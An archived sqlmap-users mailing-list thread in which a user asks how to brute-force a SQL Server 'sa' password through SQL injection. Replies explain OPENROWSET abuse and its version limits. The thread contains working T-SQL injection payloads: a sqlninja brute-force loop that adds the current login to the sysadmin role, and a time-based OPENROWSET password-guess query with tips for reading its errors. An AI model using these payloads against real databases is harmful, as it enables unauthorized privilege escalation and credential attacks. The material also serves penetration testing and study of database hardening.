Thread: [sqlmap-users] bruteforce SA password using SQL INJECTION
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: juan m. <j.m...@gm...> - 2012-07-20 11:14:35
|
there is a way for bruteforce the SA password using SQL INJECTION? this is the Scenario. it is a DataBase Server (Sql Server 2008) without access to the internet (it has the 1433 port blocked), the current user is a normal user (low privileges User). cannot get SA hash password. the question is, is there any tool or code or way to bruteforce the SA password? without direct access to the Sql Server? It is a request for add this functionality to SQLMAP, I don't know if is possible. Thanks. |
|
From: Chris O. <chr...@gm...> - 2012-07-20 11:20:55
|
Hi Juan If openrowset is enabled then it's possible to attack with a wordlist. This was disabled by default after sql server 2000 though, so it'd have to be enabled. Chris On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote: > there is a way for bruteforce the SA password using SQL INJECTION? > > this is the Scenario. it is a DataBase Server (Sql Server 2008) without > access to the internet (it has the 1433 port blocked), > the current user is a normal user (low privileges User). cannot get SA > hash password. > > the question is, is there any tool or code or way to bruteforce the SA > password? without direct access to the Sql Server? > > It is a request for add this functionality to SQLMAP, I don't know if is > possible. > > Thanks. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-20 12:03:02
|
Hi Juan, Microsoft SQL Server has a built-in function called OPENROWSET to query another DBMS (or the DBMS itself). Back in 2002 Chris Anley released a paper demonstrating how to abuse this function to perform a DBMS user's password brute-force attack within the MSSQL instance. A few years later the attack has been automated in sqlninja[1]. We have an issue open on GitHub[2] to implement the same DBA password brute-force attack. We have the required code in place, see issue #34[3] and will soon close the whole thing. However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL 2005 RTM it is disabled by thereforce, hence either the database administrator has manually enabled it, or you won't be able to abuse this function to brute-force the 'sa' (DBA) password hash or run statements on his behalf. [1] http://sqlninja.sourceforge.net [2] https://github.com/sqlmapproject/sqlmap/issues/31 [3] https://github.com/sqlmapproject/sqlmap/issues/34 Regards, Bernardo On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote: > there is a way for bruteforce the SA password using SQL INJECTION? > > this is the Scenario. it is a DataBase Server (Sql Server 2008) without > access to the internet (it has the 1433 port blocked), > the current user is a normal user (low privileges User). cannot get SA hash > password. > > the question is, is there any tool or code or way to bruteforce the SA > password? without direct access to the Sql Server? > > It is a request for add this functionality to SQLMAP, I don't know if is > possible. > > Thanks. > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
|
From: juan m. <j.m...@gm...> - 2012-07-24 13:26:36
|
I was trying sqlninja.
this is the query it use for bruteforce SA password with 1 character
(numbers and letters).
declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q
nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set
@z='''''' set @p=@p+@z set @q=N'select 1 from
OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
1;exec master.dbo.sp_addsrvrolemember
'''''+system_user+N''''',''''sysadmin'''' '')' exec
master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
but I am receiving this error:
*Could not find stored procedure 'master.dbo.xp_execresultset'.*
it was in the HTTP response. this error is because the "openrowset" is
disable? or is just that the "SA" password is not the correct. (like
"password wrong" error).
there is any way to check if "openrowset" is enable?
thanks.
On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <
ber...@gm...> wrote:
> Hi Juan,
>
> Microsoft SQL Server has a built-in function called OPENROWSET to
> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
> released a paper demonstrating how to abuse this function to perform a
> DBMS user's password brute-force attack within the MSSQL instance. A
> few years later the attack has been automated in sqlninja[1].
> We have an issue open on GitHub[2] to implement the same DBA password
> brute-force attack. We have the required code in place, see issue
> #34[3] and will soon close the whole thing.
>
> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
> 2005 RTM it is disabled by thereforce, hence either the database
> administrator has manually enabled it, or you won't be able to abuse
> this function to brute-force the 'sa' (DBA) password hash or run
> statements on his behalf.
>
> [1] http://sqlninja.sourceforge.net
> [2] https://github.com/sqlmapproject/sqlmap/issues/31
> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>
> Regards,
> Bernardo
>
>
> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
> > there is a way for bruteforce the SA password using SQL INJECTION?
> >
> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
> > access to the internet (it has the 1433 port blocked),
> > the current user is a normal user (low privileges User). cannot get SA
> hash
> > password.
> >
> > the question is, is there any tool or code or way to bruteforce the SA
> > password? without direct access to the Sql Server?
> >
> > It is a request for add this functionality to SQLMAP, I don't know if is
> > possible.
> >
> > Thanks.
> >
> >
> ------------------------------------------------------------------------------
> > Live Security Virtual Conference
> > Exclusive live event will cover all the ways today's security and
> > threat landscape has changed and how IT managers can respond. Discussions
> > will include endpoint security, mobile security and the latest in malware
> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
>
|
|
From: Chris O. <chr...@gm...> - 2012-07-25 09:16:00
|
Hi Juan
I'm not convinced it's due to either of your suggestions.
If openrowset is disabled, you'll get an error message that begins
something like:
SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource' of
component 'Ad Hoc Distributed Queries' because this component is turned off
as part of the security configuration for this server.
The statement that your instance of SQLNinja is sending out differs from
mine (are you using -m b -w /path/to/wordlist.txt)? My queries looks
similar to this:
select * from
OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=sa;pwd=passwordguess','waitfor
delay ''0:0:59'';select 1;');--
If the sa password is incorrect, the error message should be along the
lines of:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'sa'.
If the sa password is correct, then you'll get the appropriate delay and
probably a 200 response (though not necessarily, but you'll definitely get
the delay).
I'm guessing that your error message is something to do with user
permissions for the DBMS, a quick Google seemed to suggest that, but I'm
confident it has little to do with openrowset being disabled or an
incorrect sa password. I assume you have mixed mode authentication in
place on SQL Server?
You can check if openrowset is enabled using sp_configure, see the
following link for more information:
http://social.msdn.microsoft.com/Forums/en/transactsql/thread/c3d3295b-933b-4ee8-934c-87c8d6a47260
Sorry to talk about a different SQL injection tool on this list. I would
add that it'd be good to see some of the bits of SQLNinja functionality
that are missing from SQLMap implemented in the future if it's not already
planned (not that there's a lot of missing functionality).
Cheers
Chris
On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:
> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q
> nvarchar (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
> while @a<37 begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set
> @z='''''' set @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
>
> *Could not find stored procedure 'master.dbo.xp_execresultset'.*
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
>
> thanks.
>
>
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. <
> ber...@gm...> wrote:
>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> hash
>> > password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Live Security Virtual Conference
>> > Exclusive live event will cover all the ways today's security and
>> > threat landscape has changed and how IT managers can respond.
>> Discussions
>> > will include endpoint security, mobile security and the latest in
>> malware
>> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-25 10:44:39
|
Hi Juan,
master.dbo.xp_execresultset is a stored extended procedure available
on Microsoft SQL Server 2000. It is not availabe on MSSQL 2005/2008
onwards by default, hence the error message and the DBA brute force
attack fails.
Bernardo
On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:
> I was trying sqlninja.
>
> this is the query it use for bruteforce SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar
> (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37
> begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set
> @p=@p+@z set @q=N'select 1 from
> OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select
> 1;exec master.dbo.sp_addsrvrolemember
> '''''+system_user+N''''',''''sysadmin'''' '')' exec
> master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1
>
> but I am receiving this error:
>
>
> Could not find stored procedure 'master.dbo.xp_execresultset'.
>
> it was in the HTTP response. this error is because the "openrowset" is
> disable? or is just that the "SA" password is not the correct. (like
> "password wrong" error).
>
> there is any way to check if "openrowset" is enable?
>
>
> thanks.
>
>
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3] and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by thereforce, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > there is a way for bruteforce the SA password using SQL INJECTION?
>> >
>> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without
>> > access to the internet (it has the 1433 port blocked),
>> > the current user is a normal user (low privileges User). cannot get SA
>> > hash
>> > password.
>> >
>> > the question is, is there any tool or code or way to bruteforce the SA
>> > password? without direct access to the Sql Server?
>> >
>> > It is a request for add this functionality to SQLMAP, I don't know if is
>> > possible.
>> >
>> > Thanks.
>> >
>> >
>> > ------------------------------------------------------------------------------
>> > Live Security Virtual Conference
>> > Exclusive live event will cover all the ways today's security and
>> > threat landscape has changed and how IT managers can respond.
>> > Discussions
>> > will include endpoint security, mobile security and the latest in
>> > malware
>> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)
>
>
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
|
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X